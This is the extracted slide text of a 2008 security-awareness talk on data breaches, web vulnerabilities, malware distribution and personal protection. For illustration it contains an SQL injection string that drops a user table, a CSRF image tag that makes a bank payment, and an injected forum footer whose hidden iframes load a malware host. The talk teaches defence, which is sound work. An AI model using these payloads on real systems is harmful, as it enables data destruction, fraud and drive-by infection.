Protecting the World from Cybercrime

Neil Daswanihttp://www.neildaswani.com

August 27, 2008

Overview

Data breaches Hacking / Web application vulnerabilities What can software developers do?

Malware distribution What is Google doing?

What can you do to protect yourself?

Is the sky falling?

• TJX (March 2007)– owns TJ Maxx, Marshalls, and other dept stores– over 45 million credit card (CC) #s dating back to 2002– attacks exploited WEP used at branches

• Department of Veteran Affairs (August 2006)Unisys (sub-contractor) took equipment home/burglarizedName, DOB, SSN, address, insurance for 26.5M veteransEmployee dismissed, supervisor resigned

CardSystems (June 2005)credit card payment processing company: out of business43 million CC #s stored unencrypted / compromised263,000 CC #s stolen from database via SQL Injection

Data Breaches

Over 230 million lost or stolen customer records since 2005. How did that happen?

Source: privacyrights.org

Hacking

StolenEquipment

LostEquipment

What do you mean “hacking?”

Attacker Provides This Attacker Provides This InputInput

Username &Password

SELECT passwdFROM USERS

WHERE uname IS ‘$username’

Normal QueryNormal Query

WebBrowser

WebServer Database

01001010101010100101

SELECT passwdFROM USERS

WHERE uname IS ‘’; DROP TABLE

USERS; -- '

Malicious QueryMalicious Query

Eliminates all Eliminates all user user

accountsaccounts

“Username &Password”

WebBrowser

WebServer Database

http://xkcd.com/327/

Cross-Site-Request-Forgery (XRSF)

Attack scenario:Alice is using a (“good”) web-application:

www.bank.com

(assume user is logged in w/ cookie)

At the same time (i.e. same browser session), she’s also visiting a “malicious” web-application:

www.evil.com

XSRF

/viewbalanceCookie: sessionid=40a4c04de

““Your balance is $25,000”Your balance is $25,000”

Alice bank.com/login.html

/authuname=alice&pass=ilovebobCookie: sessionid=40a4c04de

evil.com

XSRFAlice bank.com

/login.html

/authuname=alice&pass=ilovebobCookie: sessionid=40a4c04de

/evil.html<IMG SRC=http://bank.com/paybill?addr=123 evil st & amt=$10000>

/paybill?addr=123 evil st, amt=$10000Cookie: sessionid=40a4c04de

““OK. Payment Sent!”OK. Payment Sent!”

What can the software community do?

Software Developers: Arm / educate yourself! (e.g., www.learnsecurity.com) Elect a security czar for each project

Managers: Instrument development process for security Organize for security (advisors, satellites, etc) Invest in training!

Secure Development Lifecycle

Source: Software Security, Gary McGraw, ISBN 0-321-35670-6

Malware

Logs keystrokes (including passwords) Joins a botnet Sends email spam from your machine Other countless bad things...

<!--Copyright Information --> <div align=’center’class=’copyright’>Powered by <a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final&copy;2003&nbsp; <a href=’http://www.invisionpower.com’>IPS,Inc.</a></div><iframe src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe> <iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>

Malware Distribution

Old style: email, peer-to-peer, etc New style: infect web pages &

drive-by-downloads

Building Botnets with SQL Injection

Query forvulnerable sites

Attacker Target Site(s)

Query forvulnerable sites

SearchEngineSearchEngine Target Site(s)

User

View Page

Get Infected:Drive-by-download

Inject maliciousJavascript/ActiveX

What do you want to do today?

Log keystrokes, DoS, etc.

“This site may harm your computer”

Really! We're not kidding!

How does Google do that?

Uses Google'ssearch index anddistributed systems

Social Engineering

BREAKING NEWS: Abortion outlawed in California How to save money on gas Millions of credit card numbers stolen from bank

database, find out if you are affected Google launches free music downloads in China Jerry Yang relinquishes control over Yahoo McCain gives up fighting for presidency US Dollar hits 6-year high, further gains expected

Next-Generation Phishing + Malware

What can you do to protect yourself?

Change default router password. Use WPA. Use a personal firewall. Always keep ON. Use good anti-virus. (e.g. pack.google.com) Install patches immediately. Use auto-update. Make backups or use backup service. Use browser with malware & phishing

protection (e.g. Firefox 3).

What can you do to protect yourself?

Don't install software you don't trust. Use bookmarks for financial sites (or Google). Check for SSL / HTTPS for important sites. Don't ignore security warnings. Use good passwords and reset questions. Use a credit card with a threshold limit.

Consider virtual, one-time credit cards. If it sounds too good to be true, it probably is!

Summary

What can software people do? Learn, organize, prevent, etc

What is Google doing? Protecting you while you search & browse

What can you do? Be vigilant!

Acknowledgements

Amit Patel Arkajit Dey “Jedis” on Google's Security Team